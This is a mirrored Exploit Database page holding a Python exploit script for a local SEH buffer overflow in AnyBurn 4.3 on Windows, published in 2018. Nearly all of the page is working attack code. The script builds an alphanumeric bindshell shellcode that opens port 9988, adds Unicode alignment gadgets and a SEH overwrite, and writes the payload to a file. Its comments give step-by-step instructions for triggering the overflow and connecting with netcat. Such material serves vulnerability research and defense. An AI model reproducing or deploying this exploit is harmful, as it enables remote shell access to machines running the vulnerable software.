AnyBurn 4.3 – Local Buffer Overflow (SEH)

• Exploit Database
• 10 阅读

• 作者： Matteo Malvica
  日期： 2018-12-21
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46025/

• #!/usr/bin/env python
  
  # Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)
  # Date: 20-12-2018
  # Exploit Author: Matteo Malvica
  # Vendor Homepage: http://www.anyburn.com/
  # Software Link : http://www.anyburn.com/anyburn_setup.exe
  # Tested Version: 4.3 (32-bit) 
  # Tested on: Windows 7 x64 SP1
  # Credits: original vulnerability discovered by Achilles: https://www.exploit-db.com/exploits/46002
  
  # Steps to reproduce:
  # 1.- Run the python code
  # 2.- Open exploit.txt and copy its content to the clipboard
  # 3.- Open AnyBurn and choose 'Copy disk to Image'
  # 4.- Paste the content of exploit.txt into the field: 'Image file name'
  # 5.- Click 'Create Now' 
  # 6.- Check with command prompt 'netstat -ano' and you should see a port listening on 9988
  # 7.- With windows firewall disabled, from another host: 'nc [remote_IP] 9988'
  
  
  # alphanumeric bindshell - port 9988, courtesy of b33f
  shellcode = (
  "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
  "AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
  "BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
  "BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
  "KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
  "1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
  "CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
  "JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN"
  "IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
  "K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
  "SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
  "WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
  "6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
  "EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")
  
  
  # total payload length 10000
  
  align = (
  "\x55"#push EBP - closer register to our shellcode, from where we are pivoting
  "\x6e"#Venetian Padding
  "\x58"#pop EAX
  "\x6e"#Venetian Padding
  "\x05\x22\x11"#add eax,0x11002200\
  "\x6e"#Venetian Padding |> +0xB00 
  "\x2d\x17\x11"#sub eax,0x11001700/
  "\x6e"#Venetian Padding
  "\x50"#push EAX
  "\x6e"#Venetian Padding
  "\xC3") #RETN
  
  nseh = "\x94\x94" 			# ANSI x94 translates to Unicode 201D
  seh ="\xb5\x4d" 			# 0x004d00b5 POP POP RET in AnyBurn.exe module
  
  preamble = "\x58" * 47 + shellcode + "\x58" * (9197-47- len(shellcode)) + nseh + seh
  unicode_nops = "\x58" * 200
  exploit = preamble + align + unicode_nops + "\x58" * (10000 - len(preamble) - len(unicode_nops)-len(align))
  
  try:
  	f=open("exploit.txt","w")
  	print "[+] Creating %s bytes lasagna payload.." %len(exploit)
  	f.write(exploit)
  	f.close()
  	print "[+] File created!"
  except:
  	print "File cannot be created"